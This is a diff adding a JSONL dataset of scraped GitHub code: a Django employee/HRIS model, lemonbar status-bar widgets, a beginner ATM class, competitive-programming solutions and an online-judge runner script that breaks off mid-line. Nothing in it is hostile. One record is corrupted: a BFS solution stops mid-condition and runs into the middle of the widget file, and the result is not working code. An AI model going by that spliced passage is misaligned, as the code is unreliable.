diff --git "a/6266.jsonl" "b/6266.jsonl" new file mode 100644--- /dev/null +++ "b/6266.jsonl" @@ -0,0 +1,837 @@ +{"seq_id":"19299662987","text":"import logging\n\nfrom pathlib import Path\nfrom django.db import models, IntegrityError\nfrom django.db.models.signals import pre_save\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom common.functions import password_generator\nfrom hris_integration.models.encryption import PasswordField\nfrom hris_integration.models import InactiveMixin\nfrom time import time\nfrom employee.validators import UPNValidator, UsernameValidator\nfrom extras.models import Notification\n\nfrom .base import EmployeeBase\n\nlogger = logging.getLogger(\"employee.models\")\n__all__ = (\"employee_upload_to\", \"Employee\", \"EmployeeImport\")\n\nUPDATE_FIELDS_ALWAYS = [\n # \"manager\", # updated in pre_save\n \"primary_job\",\n # \"jobs\", # updated in pre_save\n \"type\",\n \"state\",\n \"leave\",\n \"start_date\",\n]\nUPDATE_FIELDS_OPTIONAL = [\n \"first_name\",\n \"last_name\",\n \"middle_name\",\n \"location\",\n \"email_alias\",\n \"username\",\n]\n\n\ndef employee_upload_to(instance: \"Employee\", filename: str) -> str:\n \"\"\"\n The upload_to file path resolver function for the Employee model's image field.\n\n :param instance: the Employee instance\n :type instance: Employee\n :param filename: The filename of the uploaded file\n :type filename: str\n :return: the file path\n :rtype: str\n \"\"\"\n\n return f\"employeephoto/{instance.id}/{filename}\"\n\n\nclass Employee(EmployeeBase, InactiveMixin):\n \"\"\"The base Employee Form. This represents the mutable entity for each employee.\n This table used the Modified Preorder Tree Traversal extension to allow for mappings\n between the employee and the employee's manager and my extension direct-reports.\n \"\"\"\n\n class Meta:\n db_table = \"employee\"\n\n id = models.AutoField(primary_key=True)\n #: The Employee ID for the employee.\n employee_id: int = models.IntegerField(blank=True, null=True, unique=True)\n #: If this model has a matched EmployeeImport record.\n is_imported: bool = models.BooleanField(default=False)\n #: If the employee has been exported to Active Directory. Used for filtering.\n is_exported_ad: bool = models.BooleanField(default=False)\n #: The Active Directory unique identifier for the employee.\n guid: str = models.CharField(max_length=40, null=True, blank=True)\n\n #: The nickname of the employee.\n nickname: str = models.CharField(max_length=96, null=True, blank=True)\n #: Designations that the employee holds\n designations: str = models.CharField(max_length=256, blank=True, null=True)\n #: The path the the employees uploaded file.\n photo: str = models.FileField(upload_to=employee_upload_to, null=True, blank=True)\n\n #: The employees password (encrypted at the database level).\n password: str = PasswordField(null=True, blank=True, default=password_generator)\n\n def __eq__(self, other) -> bool:\n \"\"\"Checks if the two models are the same using key fields.\"\"\"\n\n if not isinstance(other, Employee):\n return False\n\n if int(self.id) != int(other.pk):\n return False\n\n for field in [\n \"first_name\",\n \"last_name\",\n \"middle_name\",\n \"suffix\",\n \"start_date\",\n \"state\",\n \"leave\",\n \"username\",\n \"photo\",\n \"email_alias\",\n ]:\n if getattr(self, field) != getattr(other, field):\n return False\n\n if (\n self.manager is None\n and other.manager is not None\n or self.manager is not None\n and other.manager is None\n ):\n return False\n elif self.manager and other.manager and self.manager.pk != other.manager.pk:\n return False\n if (\n self.location is None\n and other.location is not None\n or self.location is not None\n and other.location is None\n ):\n return False\n elif self.location and other.location and self.location.pk != other.location.pk:\n return False\n if (\n self.primary_job is None\n and other.primary_job is not None\n or self.primary_job is not None\n and other.primary_job is None\n ):\n return False\n elif (\n self.primary_job\n and other.primary_job\n and self.primary_job.pk != other.primary_job.pk\n ):\n return False\n\n return True\n\n def __ne__(self, other) -> bool:\n return not self.__eq__(other)\n\n def __hash__(self):\n if self.pk is None:\n raise TypeError(\"Model instances without primary key value are un-hashable\")\n return hash(self.pk)\n\n def __str__(self):\n return f\"Employee: {self.first_name} {self.last_name}\"\n\n def clear_password(self, confirm: bool = False) -> None:\n \"\"\"Unset the password field and save the model.\"\"\"\n if confirm:\n self.password = None\n self.save()\n\n @classmethod\n def reset_username(cls, instance: \"Employee\") -> None:\n \"\"\"Regenerate a username, useful for new employees or re-hired employees\n\n :param instance: The employee to reset the username for\n :param instance: Employee\n :raises ValueError: If the username cannot be generated after 10 cycles\n \"\"\"\n for x in range(0, 10):\n username = UsernameValidator(instance.first_name, instance.last_name, x)\n username.clean()\n if username.username == instance.username:\n return\n if username.is_valid():\n try:\n e = cls.objects.get(username=username.username)\n if e.id == instance.id:\n return\n\n except Employee.DoesNotExist:\n instance.username = username.username\n return\n\n raise ValueError(\"Could not generate a unique username\")\n\n @classmethod\n def reset_upn(cls, instance: \"Employee\") -> None:\n \"\"\"\n Regenerate a users upn or email_alias, useful for new employees or re-hired\n employees\n\n :param instance: The employee to reset the upn for\n :param instance: Employee\n :raises ValueError: If the username cannot be generated after 10 cycles\n \"\"\"\n for x in range(0, 10):\n upn = UPNValidator(instance.first_name, instance.last_name, x)\n upn.clean()\n if upn.username == instance.email_alias:\n return\n if upn.is_valid():\n try:\n e = cls.objects.get(email_alias=upn.username)\n if e.id == instance.id:\n return\n\n except Employee.DoesNotExist:\n instance.email_alias = upn.username\n return\n\n raise ValueError(\"Could not generate a unique username\")\n\n @classmethod\n def pre_save(cls, sender, instance, raw, using, update_fields, **kwargs):\n try:\n if instance.id:\n prev_instance = Employee.objects.get(id=instance.id)\n else:\n prev_instance = None\n except Employee.DoesNotExist:\n prev_instance = None\n\n if prev_instance:\n if (\n prev_instance.status == cls.STATE_TERM\n and instance.status != cls.STATE_TERM\n ):\n logger.info(f\"{instance} transitioned from terminated to active\")\n cls.reset_username(instance)\n cls.reset_upn(instance)\n elif (\n prev_instance.status != instance.STATE_TERM\n and instance.status == instance.STATE_TERM\n ):\n logger.info(f\"{instance} transitioned from active to terminated\")\n t = str(round(time()))\n instance.username = instance.username[:15]\n instance.username += t[-(20 - len(instance.username)) :]\n instance.email_alias = f\"{instance.username}{round(time())}\"[:64]\n\n if instance.username is None:\n cls.reset_username(instance)\n\n if instance.email_alias is None:\n cls.reset_upn(instance)\n\n if prev_instance and prev_instance != instance:\n #: The employee has changed, so we need to update the updated_on field to\n # for correct delta changes.\n instance.updated_on = timezone.now()\n if prev_instance.photo and prev_instance.photo != instance.photo:\n # Delete the old photo\n f = Path(settings.MEDIA_ROOT, str(prev_instance.photo.path))\n if f.exists():\n f.unlink()\n\n if instance.updated_on is None:\n instance.updated_on = timezone.now()\n\n if instance.username is None and instance.active:\n cls.reset_username(instance)\n\n if instance.email_alias is None and instance.active:\n cls.reset_upn(instance)\n\n\npre_save.connect(Employee.pre_save, sender=Employee)\n\n\nclass EmployeeImport(EmployeeBase):\n \"\"\"\n This Class is used to store the data that is imported from the upstream\n HRIS Database system.\n \"\"\"\n\n class Meta:\n db_table = \"employee_import\"\n\n #: The employee's id in the upstream HRIS system.\n id: int = models.IntegerField(primary_key=True)\n #: If the employee has been matched\n is_matched: bool = models.BooleanField(default=False)\n #: The matched Employee object.\n employee: Employee = models.OneToOneField(\n Employee, on_delete=models.PROTECT, blank=True, null=True\n )\n\n def __eq__(self, other) -> bool:\n \"\"\"Check if two EmployeeImport objects are equal using key values.\"\"\"\n if not isinstance(other, Employee):\n return False\n\n if int(self.id) != int(other.pk):\n return False\n\n for field in [\n \"first_name\",\n \"last_name\",\n \"middle_name\",\n \"suffix\",\n \"state\",\n \"leave\",\n ]:\n if getattr(self, field) != getattr(other, field):\n return False\n\n if (\n self.location is None\n and other.location is not None\n or self.location is not None\n and other.location is None\n ):\n return False\n elif self.location and other.location and self.location.pk != other.location.pk:\n return False\n if (\n self.primary_job is None\n and other.primary_job is not None\n or self.primary_job is not None\n and other.primary_job is None\n ):\n return False\n elif (\n self.primary_job\n and other.primary_job\n and self.primary_job.pk != other.primary_job.pk\n ):\n return False\n\n return True\n\n def __ne__(self, other) -> bool:\n return not self.__eq__(other)\n\n def __hash__(self):\n if self.pk is None:\n raise TypeError(\"Model instances without primary key value are un-hashable\")\n return hash(self.pk)\n\n def __str__(self) -> str:\n return f\"{self.id}: {self.first_name} {self.last_name}\"\n\n @classmethod\n def pre_save(cls, sender, instance, raw, using, update_fields, **kwargs):\n if instance.employee and not instance.is_matched:\n instance.is_matched = True\n elif instance.employee is None and instance.is_matched:\n instance.is_matched = False\n\n if instance.id:\n try:\n prev_instance = EmployeeImport.objects.get(id=instance.id)\n except EmployeeImport.DoesNotExist:\n prev_instance = None\n else:\n prev_instance = None\n\n if prev_instance and instance != prev_instance:\n instance.updated_on = timezone.now()\n\n if instance.is_matched:\n ec = False\n if (\n instance.manager\n and instance.manager != prev_instance.manager\n and instance.manager.is_matched\n ):\n instance.employee.manager = instance.manager.employee\n ec = True\n for job in instance.jobs.all():\n if job not in instance.employee.jobs.all():\n instance.employee.jobs.add(job)\n ec = True\n\n for key in UPDATE_FIELDS_OPTIONAL:\n if (\n getattr(instance.employee, key, None) is None\n or getattr(instance.employee, key)\n == getattr(prev_instance, key)\n and getattr(instance, key) != getattr(prev_instance, key)\n ):\n setattr(instance.employee, key, getattr(instance, key))\n ec = True\n\n for key in UPDATE_FIELDS_ALWAYS:\n if getattr(instance, key, None) != None:\n setattr(instance.employee, key, getattr(instance, key))\n ec = True\n\n if prev_instance.employee is None:\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n instance.employee.save()\n except IntegrityError:\n logger.warning(\n \"Employee ID is already associated with an employee,\"\n \"attempting to clear\"\n )\n e = Employee.objects.get(employee_id=instance.id)\n if e != instance.employee:\n e.employee_id = None\n e.is_imported = False\n logger.warning(f\"Unlinked employee id from {str(e)}\")\n e.save()\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n instance.employee.save()\n except IntegrityError:\n logger.error(\n f\"Failed to unlink employee id {instance.id} from \"\n f\"employee {str(e)}. Converting {str(instance)} to a \"\n \"pending employee.\"\n )\n instance.is_matched = False\n ec = True\n Notification.objects.create(\n message=(\n f\"Source employee {str(instance)} and employee \"\n f\"{str(instance.employee)} are in an inconsistent \"\n f\"state. Please validate that multiple employees are \"\n f\"not associated with the same employee ID.\"\n ),\n level=Notification.ERROR,\n source=\"Employee Import\",\n source_repr=repr(instance),\n source_id=instance.id,\n )\n\n if ec:\n instance.employee.save()\n\n if prev_instance is None and instance.is_matched:\n if instance.manager and instance.manager.is_matched:\n instance.employee.manager = instance.manager.employee\n for job in instance.jobs.all():\n instance.employee.jobs.add(job)\n for key in UPDATE_FIELDS_ALWAYS:\n if getattr(instance, key, None) != None:\n setattr(instance.employee, key, getattr(instance, key))\n\n for key in UPDATE_FIELDS_OPTIONAL:\n if getattr(instance.employee, key, None) is None:\n setattr(instance.employee, key, getattr(instance, key))\n\n if instance.employee:\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n instance.employee.save()\n ec = True\n except IntegrityError:\n logger.warning(\n \"Employee ID is already associated with an employee, attempting \"\n \"to clear\"\n )\n e = Employee.objects.get(employee_id=instance.id)\n if e != instance.employee:\n e.employee_id = None\n e.is_imported = False\n logger.warning(f\"Unlinked employee id from {str(e)}\")\n e.save()\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n ec = True\n except IntegrityError:\n logger.error(\n f\"Failed to unlink employee id {instance.id} from employee \"\n f\"{str(e)}. Converting {str(instance)} to a pending \"\n \"employee.\"\n )\n instance.is_matched = False\n ec = True\n Notification.objects.create(\n message=(\n f\"Source employee {str(instance)} and employee \"\n f\"{str(instance.employee)} are in an inconsistent \"\n f\"state. Please validate that multiple employees are \"\n f\"not associated with the same employee ID.\"\n ),\n level=Notification.ERROR,\n source=\"Employee Import\",\n source_repr=repr(instance),\n source_id=instance.id,\n )\n\n if instance.updated_on is None:\n instance.updated_on = timezone.now()\n\n\npre_save.connect(EmployeeImport.pre_save, sender=EmployeeImport)\n","repo_name":"jcarswell/hris-integration","sub_path":"hris_integration/employee/models/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":18546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17401539888","text":"from sys import *\ns=stdin.readline().split(\" \")\nn=int(s[0])\nk=int(s[1])\n\nm=[]\nfor j in range(n):\n m.append([])\n for i in range(n):\n m[j].append(0)\nfor i in range(k):\n s=stdin.readline().split(\" \")\n y=int(s[0])\n x=int(s[1])\n m[y][x]=1\nvisited=[]\ndef init():\n global visited\n for j in range(len(m)):\n visited.append([])\n for i in range(len(m[0])):\n visited[j].append(False)\ninit()\nclass Node:\n def __init__(self,x,y):\n self.x=x\n self.y=y\n self.parent=None\n def __eq__(self,o):\n return self.x==o.x and self.y==o.y\n def __str__(self):\n return str(self.x)+\":\"+str(self.y)\n\ntx=[0,1,0,-1]\nty=[1,0,-1,0]\ncount=0\ndef bfs(list_from,end):\n global visited,count\n new_list=[]\n for node in list_from:\n if node==end:\n return node\n for i in range(len(tx)):\n count+=1\n x=node.x+tx[i]\n y=node.y+ty[i]\n if x>=0 and y>=0 and x= self.prevtime + self.interval) or self.refresh:\n self.update()\n self.prevtime = time()\n self.refresh = False\n\n if self.display:\n return self.template.format_map(self.SafeDict(value=self.output))\n return ''\n\n def update(self):\n raise NotImplementedError('Function needs to be implemented')\n\n\nclass Raw(Base):\n def __init__(self, text='', **kwds):\n super().__init__(**kwds)\n self.output = text\n\n def __call__(self):\n return self.template.format_map(self.SafeDict(value=self.output))\n\n\nclass Align(Raw):\n def __init__(self, align, **kwds):\n super().__init__(**kwds)\n self.output = '%{{{}}}'.format(align)\n\n\nclass Clock(Widget):\n def __init__(self, layout='%d %b %Y %H:%M:%S', **kwds):\n super().__init__(**kwds)\n self.layout = layout\n\n def update(self):\n self.output = datetime.today().strftime(self.layout)\n\n\nclass Volume(Widget):\n def update(self):\n m = Mixer()\n self.output = '{}%'.format(m.getvolume()[0])\n\n\nclass WorkspacesDots(Widget):\n i3 = i3ipc.Connection()\n\n def __init__(self, underline=None,\n icons={'empty': 'o', 'nonempty': '0',\n 'visible': 'x'}, spacing=0, **kwds):\n super().__init__(**kwds)\n self.icons = {}\n for k, icon in icons.items():\n self.icons[k] = self.format_icon(icon)\n self.underline = underline\n self.spacing = spacing\n\n def update(self):\n out = [self.icons['empty'] for __ in range(10)]\n for workspace in self.i3.get_workspaces():\n ind = int(workspace['num']) - 1\n if ind < 0:\n ind = 9\n\n if workspace['visible']:\n out[ind] = self.icons['visible']\n else:\n out[ind] = self.icons['nonempty']\n\n if workspace['focused']:\n out[ind] = '%{!u}' + out[ind] + '%{!u}'\n\n self.output = (' '*self.spacing).join(out)\n\n if self.underline:\n self.output = '%{{U{}}}'.format(self.underline)\\\n + self.output + '%{U-}'\n\n\nclass Memory(Widget):\n def __init__(self, percentage=False, interval=5, **kwds):\n super().__init__(interval=interval, **kwds)\n self.percentage = percentage\n\n def update(self):\n with open('/proc/meminfo', 'r') as mem:\n total = 0\n available = 0\n for line in mem:\n line_split = line.split()\n if line_split[0] == 'MemTotal:':\n total = int(line_split[1])\n elif line_split[0] in ['MemFree:', 'Buffers:', 'Cached:']:\n available += int(line_split[1])\n used_mb = round((total-available)/1024)\n used_perc = round((available/total)*100)\n self.output = used_perc if self.percentage else used_mb\n self.output = str(self.output) + 'M'\n\n\nclass IPAddress(Widget):\n def __init__(self, interface='eth0', interval=900, **kwds):\n super().__init__(interval=interval, **kwds)\n self.interface = interface.encode('utf-8')\n\n def update(self):\n def get_ip_address(ifname):\n # Props to 'Martin Konecny' on SO\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15])\n )[20:24])\n self.output = get_ip_address(self.interface)\n\n\nclass Ping(Widget):\n def __init__(self, host='8.8.8.8', interval=5, **kwds):\n super().__init__(interval=interval, **kwds)\n self.host = host\n\n def update(self):\n ping = subprocess.Popen('ping -c1 -W1 {}'.format(self.host),\n shell=True, stdout=subprocess.PIPE\n ).stdout.read()\n reg = re.search('\\d\\d\\.\\d{3}/(\\d\\d\\.\\d{3})/\\d\\d\\.\\d{3}',\n ping.decode())\n if reg:\n self.output = round(float(reg.groups()[0]))\n else:\n self.output = 0\n self.output = str(self.output) + 'ms'\n\n\nclass Music(Widget):\n player = Playerctl.Player()\n\n def update(self):\n if self.player.get_property('status') == 'Playing':\n self.display = True\n self.output = '{} - {}'.format(self.player.get_artist(),\n self.player.get_title())\n else:\n self.display = False\n\n\nclass Battery(Widget):\n ''' Load from sys class '''\n def __init__(self, power_supply='BAT0',\n icons={'charging': 'c', 'discharging': 'd'}, **kwds):\n super().__init__(**kwds)\n self.power_supply = power_supply\n self.icons = icons\n\n def update(self):\n with open('/sys/class/power_supply/{}/status'\\\n .format(self.power_supply), 'r') as f:\n charging = 'Charging' in f.read()\n\n with open('/sys/class/power_supply/{}/capacity'\\\n .format(self.power_supply), 'r') as f:\n capacity = f.read().strip()\n\n if charging:\n self.output = '{} '.format(self.icons['charging'])\n else:\n num_of_icons = len(self.icons['discharging'])\n ind = round(int(capacity)/100 * (num_of_icons-1))\n self.output = '{} '.format(self.icons['discharging'][ind])\n self.output += '{}%'.format(capacity)\n\n\nclass Wifi(Widget):\n def __init__(self, interface='wlan0', **kwds):\n super().__init__(**kwds)\n self.interface = interface\n\n def update(self):\n try:\n ssid = subprocess.check_output(['iw', 'dev', self.interface, 'info'])\n for l in ssid.split(b'\\n\\t'):\n if l.startswith(b'ssid'):\n self.output = l[5:].decode()\n except subprocess.CalledProcessError:\n self.output = 'Interface N/A'\n","repo_name":"Linouth/Lemonbar-Helper","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":8797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"2808193046","text":"#Lab12 ATM\n#A newly created account will default to a balance of 0 and an interest rate of 0.1%. \n#I think this has to do with class tree data types (with initializer) from lecture 28May, commented out below\n'''class Tree:\n def __init__(self, data, children=None, parent=None):\n self.data = data\n self.children = children or []\n self.parent = parent\n\n def add_child(self, data):\n child = Tree(data, parent=self)\n self.children.append(child)'''\n#let us try\nclass ATM:\n def __init__(self, balance = 0, interest_rate = 0.001, amount = 0):#balance always starts 1, interest rate 0.1\n #when you set one of the args for __init__ equal to something this means it is a default (from pete)\n self.balance = balance #arg1\n self.interest_rate = interest_rate #arg2\n self.transactions = []\n #balance is the first function we want to return something directly from __init__\n def get_balance(self):\n #self.balance = balance\n return self.balance\n #deposit is the second function that is not doing the same thing upon initialization\n def deposit(self, amount):\n #we want the balance value to increase\n self.balance += amount\n self.transactions.append(f\"user deposited {amount}.\")\n #check_withdrawal is the third function that is not doing the same thing upon initialization\n def check_withdrawal(self, amount):#in the future this could be made into a private method __check_withdrawal, so the user is not bothered by having to see this\n #we want to return true if the withdrawn amount wont make account negative\n if self.balance >= amount:\n return True\n #withdraw is the fourth function that is not doing the same thing upon initialization\n def withdraw(self, amount):\n #we want to decrease the balance by that amount\n self.balance -= amount\n self.transactions.append(f\"user withdrew {amount}.\")\n #calc_interest is the fifth function that is not doing the same thing upon initialization\n def calc_interest(self):\n #we want to multiply the balance by the interest rate, not sure what we should do with the earnings\n return self.balance * self.interest_rate\n def print_transactions(self):\n print(\"/n\".join(self.transactions))#join () method takes all items in an iterable and joins them into one string. A string must be specified as the separator. W3Schools\n\n \n '''balance(self, account):\n balance = ATM(account, balance=self)\n self.balance.append(balance)#I feel like I do not know what this means.\n def interest_rate(self, account):\n interest_rate = ATM(account, interest_rate=self)\n self.interest_rate.append(interest_rate)\n def '''\n#implement initilizer\natm = ATM() # create an **instance** of our class (also known as instantiating)\nprint('atm variable is ' + str(atm))\nprint('Welcome to the ATM')\nwhile True:\n command = input('Enter a command: balance, deposit, withdraw, interest, previous transactions, help, exit ')\n if command == 'balance':\n print('command is ' +str(command))\n #print('balance is ' + str(balance))#the variable balance has not been defined yet, here\n #print(atm.balance())\n balance = atm.get_balance() # call the balance() method\n print(f'Your balance is ${balance}')\n elif command == 'deposit':\n amount = float(input('How much would you like to deposit? '))\n atm.deposit(amount) # call the deposit(amount) method\n print(f'Deposited ${amount}')\n elif command == 'withdraw':\n amount = float(input('How much would you like '))\n if atm.check_withdrawal(amount): # call the check_withdrawal(amount) method\n atm.withdraw(amount) # call the withdraw(amount) method\n print(f'Withdrew ${amount}')\n else:\n print('Insufficient funds')\n elif command == 'interest':\n amount = atm.calc_interest() # call the calc_interest() method\n #atm.deposit(amount)\n print(f'Accumulated ${amount} in interest')\n #Previous transactions is for Version 2\n elif command == 'previous transactions':\n history = atm.print_transactions()\n elif command == 'help':\n print('Available commands:')\n print('balance - get the current balance')\n print('deposit - deposit money')\n print('withdraw - withdraw money')\n print('interest - accumulate interest')\n print('exit - exit the program')\n elif command == 'exit':\n break\n else:\n print('Command not recognized')\n'''begin = input('hey would you like to start? yes or no?').lower()\nif begin == 'yes':\n print(initializer())\nelse:\n pass\n\ndef initializer():'''\n ","repo_name":"PdxCodeGuild/class_salmon","sub_path":"code/nick/python/lab12.py","file_name":"lab12.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"90"} +{"seq_id":"18273820809","text":"def main():\n N = int(input())\n List = list(map(int,input().split()))\n Set = set()\n for i in List:\n if i in Set:\n \tprint('NO')\n \treturn\n Set.add(i)\n print('YES')\n return\nmain()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02779/s732399337.py","file_name":"s732399337.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18406295239","text":"# https://atcoder.jp/contests/abc126/tasks/abc126_d\n\n# dfsでやっていき、最初の点を黒か白かで固定する。偶数ならどんどん加えていく。\nn = int(input())\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n u, v, w = map(int, input().split())\n u -= 1\n v -= 1\n tree[u].append((v, w))\n tree[v].append((u, w))\n\n\ndef dfs(tree, n):\n visited = [False] * n\n dis = [0] * n\n even = set([0])\n stack = [0]\n while stack:\n v = stack.pop()\n cur_dis = dis[v]\n for next_v, d in tree[v]:\n if not visited[next_v]:\n visited[next_v] = True\n stack.append(next_v)\n dis[next_v] = cur_dis + d\n if (cur_dis + d) % 2 == 0:\n even.add(next_v)\n return even\n\neven = dfs(tree, n)\nfor i in range(n):\n if i in even:\n print(0)\n else:\n print(1)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03044/s874747994.py","file_name":"s874747994.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"7018441016","text":"\"\"\"\n Input by 9 or more argument\n 1 : test case\n 2 : timeLimit in ms\n 3 : memoryLimit in mb\n 4 : PROBLEM_DIR\n 5 : source path\n 6 : cmp cmd\n 7 : cmp args\n 8 : run cmd\n 9 : run args\n\n output will return by stdout in formating below\n {verdic};{score};{maxscore};{elapsed};{memory};{comment}\n\"\"\"\nfrom os import path\nimport os\nimport sys\nfrom subprocess import Popen,TimeoutExpired,PIPE\nimport time\nimport signal\n\njudgeArgs = sys.argv[-1]\n\nif not path.exists(judgeArgs):\n print(f\"!;0;1;0;0;Judge args not found :(\",end = \"\")\n exit(0)\n\ntry:\n with open(judgeArgs,\"r\") as f:\n judgeArgs = f.read().split(\"\\n\")\n\nexcept:\n print(f\"!;0;1;0;0;Can't read Judge args:(\",end = \"\")\n exit(0)\n\nif(len(judgeArgs) < 9):\n print(f\"!;0;1;0;0;Not Enough info to judge\\nexpected 9 args got {len(judgeArgs)} args\",end = \"\")\n exit(0)\n\ntry:\n\n testCase = judgeArgs[0] or \"\"\n timeLimit = int(judgeArgs[1] or \"\")#In ms\n memoryLimit = int(judgeArgs[2] or \"\")#mb\n PROBLEM_DIR = judgeArgs[3] or \"\"\nexcept:\n print(f\"!;0;1;0;0;Can't convert data :(\",end = \"\")\n exit(0)\n\nif(len(judgeArgs) < 6):\n print(f\"!;0;1;0;0;Program not Found\",end = \"\")\n exit(0)\n\n\nsrcPath = judgeArgs[4] or \"\"\n\ncmpMain = judgeArgs[5] or \"\"\ncmpArg = judgeArgs[6] or \"\"\n\noutMain = judgeArgs[7]\noutArg = judgeArgs[8]\n\n\ninPath = path.join(PROBLEM_DIR,f\"{testCase}.in\")\noutPath = path.join(PROBLEM_DIR,\"output.txt\")\nerrPath = path.join(PROBLEM_DIR,\"errout.txt\")\nsolPath = path.join(PROBLEM_DIR,f\"{testCase}.sol\")\n\n\ndef writeLog(text:str):\n with open(path.join(PROBLEM_DIR,f\"{int(time.time())}LOG.txt\"),\"w\") as f:\n f.write(text)\n\ndef execute_Window():\n start_time = time.time()\n runner = Popen(f'{outMain} {outArg} < \"{inPath}\" > \"{outPath}\" 2> \"{errPath}\"',shell= True)\n\n try:\n runner.communicate(timeout=timeLimit/1000)\n returnCode = runner.returncode\n except TimeoutExpired:\n runner.terminate()\n runner.kill()\n return timeLimit,0,\"TIMELXC\"\n\n runner.terminate()\n runner.kill()\n\n elapsed = time.time() - start_time\n\n\n if returnCode != 0:\n return elapsed*1000,0,f\"WTF M{returnCode}\"\n else:\n return elapsed*1000,0,\"OK\"\n\ndef execute_linux():\n\n isJava = outMain.find(\"java\")\n\n if isJava != -1:\n start_time = time.time()\n runner = Popen(f'{outMain} -Xmx{int(memoryLimit)}M {outArg} < \"{inPath}\" > \"{outPath}\" 2> \"{errPath}\" ; exit', shell= True, preexec_fn=os.setsid)\n else:\n start_time = time.time()\n runner = Popen(f'ulimit -v {memoryLimit*1000};{outMain} {outArg} < \"{inPath}\" > \"{outPath}\" 2> \"{errPath}\" ; exit',shell= True, preexec_fn=os.setsid)\n\n try:\n runner.communicate(timeout=timeLimit/1000)\n returnCode = runner.returncode\n except TimeoutExpired:\n if os.path.exists(\"/proc/\" + str(runner.pid)):\n os.killpg(os.getpgid(runner.pid), signal.SIGTERM)\n return timeLimit,0,\"TIMELXC\"\n\n if os.path.exists(\"/proc/\" + str(runner.pid)):\n os.killpg(os.getpgid(runner.pid), signal.SIGTERM)\n\n elapsed = time.time() - start_time\n\n\n if returnCode != 0:\n return elapsed*1000,0,f\"WTF M{returnCode}\"\n else:\n return elapsed*1000,0,\"OK\"\n\n\ndef execute():\n if sys.platform == \"linux\" or sys.platform == \"linux2\":\n return execute_linux()\n else:\n return execute_Window()\n\n\n\n\n\n\ndef compare():\n\n if(not path.exists(outPath)):return \"-\",\"File not found :(\\n\"\n\n if sys.platform == \"linux\" or sys.platform == \"linux2\":\n runner = Popen(f'cd \"{PROBLEM_DIR}\"; {cmpMain} {cmpArg} \"{solPath}\" \"{inPath}\" \"{srcPath}\"', stdout=PIPE, stdin=PIPE, stderr=PIPE,shell= True)\n else:\n runner = Popen(f'cd /d \"{PROBLEM_DIR}\" & {cmpMain} {cmpArg} \"{solPath}\" \"{inPath}\" \"{srcPath}\"', stdout=PIPE, stdin=PIPE, stderr=PIPE,shell= True)\n \n #writeLog(f'cd /d \"{PROBLEM_DIR}\" & {cmpMain} {cmpArg} \"{solPath}\" \"{inPath}\" \"{srcPath}\"')\n\n runner.communicate()\n\n if not path.exists(path.join(PROBLEM_DIR,\"grader_result.txt\")):\n return \"!\",\"grader_result Not found\"\n \n resultVerdict = \"\"\n with open(path.join(PROBLEM_DIR,\"grader_result.txt\"),\"r\") as f:\n resultVerdict = f.read().split(\"\\n\")\n \n if len(resultVerdict) == 0:\n return \"!\",0,1,\"grader Not respond :(\"\n\n if len(resultVerdict) == 1:\n if resultVerdict[0] == \"P\":\n return \"P\",1,1,\"Test ok Yey!\"\n elif resultVerdict[0] == \"W\" or resultVerdict[0] == \"-\":\n return \"-\",0,1,\"Wrong Answer\"\n else:\n return resultVerdict[0],0,1,\"????\"\n \n if len(resultVerdict) == 3:\n\n tScore = 0\n tMaxScore = 0\n \n try:\n tScore = int(resultVerdict[1])\n tMaxScore = int(resultVerdict[2])\n except:\n return \"!\",0,1,\"Can't convert score to int\"\n\n if resultVerdict[0] == \"P\":\n return \"P\",tScore,tMaxScore,\"Test ok Yey!\"\n elif resultVerdict[0] == \"H\":\n return \"H\",tScore,tMaxScore,\"Partially correct\"\n elif resultVerdict[0] == \"W\" or resultVerdict[0] == \"-\":\n return \"-\",tScore,tMaxScore,\"Wrong Answer\"\n else:\n return resultVerdict[0],tScore,tMaxScore,\"????\"\n \n if len(resultVerdict) == 4:\n\n tScore = 0\n tMaxScore = 0\n commm = resultVerdict[3]\n \n try:\n tScore = int(resultVerdict[1])\n tMaxScore = int(resultVerdict[2])\n except:\n return \"!\",0,1,\"Can't convert score to int\"\n\n if resultVerdict[0] == \"W\":\n resultVerdict[0] = '-'\n\n return resultVerdict[0],tScore,tMaxScore,commm\n\n\n return \"?\",1,1,\"WUT?\"\n\n \n\n\n#This is from Kiyago's standard judge\ndef main():\n \n if not path.exists(inPath):\n print(f\"E;0;0;0;0;End of Test\",end = \"\")\n return\n elapsed, memory, comment = execute()\n\n score = 0\n maxscore = 1.0\n if comment == \"OK\":\n\n verdic,score,maxscore,comment = compare()\n\n elif comment == \"JUDGEER\":\n verdic = \"!\"\n comment = \"Judge_Error\"\n\n elif comment == \"TIMELXC\":\n verdic = \"T\"\n comment = f\"Time Limit Exceed\\n\\nYour program run {elapsed} ms.\"\n else:\n verdic = \"X\"\n comment += f\"\\nRuntime Error!\\n============Error============\\n\"\n\n if path.exists(errPath):\n\n with open(errPath,\"r\") as f:\n comment += f.read()\n\n # Clean up tmp directory\n try:\n #if(path.exists(outPath)):os.remove(outPath)\n #if(path.exists(errPath)):os.remove(errPath)\n pass\n except:\n pass\n\n print(f\"{verdic};{score};{maxscore};{elapsed:.2f};{memory};{comment}\",end = 